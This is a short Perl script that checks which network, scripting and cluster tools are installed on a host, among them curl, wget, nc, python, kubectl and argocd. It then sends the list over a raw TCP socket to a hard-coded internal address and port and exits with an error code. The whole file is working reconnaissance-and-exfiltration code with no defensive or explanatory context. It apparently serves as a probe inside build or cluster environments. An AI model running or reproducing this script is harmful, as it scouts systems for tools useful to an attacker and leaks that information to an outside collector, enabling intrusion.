#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;
my @bins = qw(curl wget openssl nc python3 python ruby kubectl sh bash perl busybox git argocd);
my @found;
for my $b (@bins) { my $p = `/bin/sh -c 'command -v $b' 2>/dev/null`; chomp $p; push @found, "$b=$p" if $p; }
my $sock = IO::Socket::INET->new(PeerAddr => '10.10.0.169', PeerPort => 8767, Proto => 'tcp', Timeout => 3);
if ($sock) { print $sock join(',', @found)."\n"; close($sock); }
exit 1;
